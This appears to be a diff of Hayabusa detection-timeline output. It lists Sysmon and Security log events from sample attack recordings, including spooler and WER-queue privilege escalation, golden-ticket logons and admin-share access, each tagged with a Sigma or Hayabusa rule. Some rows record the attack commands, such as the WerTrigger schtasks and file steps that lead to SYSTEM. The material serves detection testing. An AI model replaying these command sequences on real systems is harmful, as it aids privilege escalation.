+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDNAMES.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDDTYPE.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHEM.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHMX.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.622 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old\1 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\blah\blah\phoneinfo.dll | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Suspicious Print Port | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports\c:\blah\blah\phoneinfo.dll: (Empty) | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SPL | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-E8D1-5F33-0000-001007B63A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:04:28.521 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:19.719 +09:00,MSEDGEWIN10,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.23,rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1740 | PGUID: 747F3D96-E90A-5F33-0000-0010863C0100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3320 | PGUID: 747F3D96-E90C-5F33-0000-0010CB420200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x41c24 | PID: 5128 | PGUID: 747F3D96-E920-5F33-0000-001043920A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | LID: 0x3e7 | PID: 6952 | PGUID: 747F3D96-E922-5F33-0000-00107A2B0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\Explorer.EXE | Tgt Process: C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 5144 | Src PGUID: 747F3D96-E914-5F33-0000-001009990500 | Tgt PID: 7480 | Tgt PGUID: 747F3D96-E928-5F33-0000-0010B8330D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7836 | PGUID: 747F3D96-E938-5F33-0000-00101CA50E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7852 | PGUID: 747F3D96-E939-5F33-0000-0010ACAB0E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7868 | PGUID: 747F3D96-E93A-5F33-0000-001014B30E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7888 | PGUID: 747F3D96-E93B-5F33-0000-0010C1B40E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wermgr.exe -upload | LID: 0x3e7 | PID: 8032 | PGUID: 747F3D96-E93C-5F33-0000-0010A6F00E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 7460 | PGUID: 747F3D96-E940-5F33-0000-001039310F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
+2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack-admu-test1 | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2275e86d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276a30d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276a30d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276b0af,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276b0af,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: JUMP01$ | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276b890,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
+2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: not_existing_user | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2276d109,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
+2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
+2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: not_existing_user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
+2020-08-25 18:58:51.434 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db | Process: C:\Windows\system32\LogonUI.exe | PID: 8500 | PGUID: 747F3D96-E0DA-5F44-0000-0010B3299600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:02:32.697 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:02:32.701 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:07:58.690 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89 | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
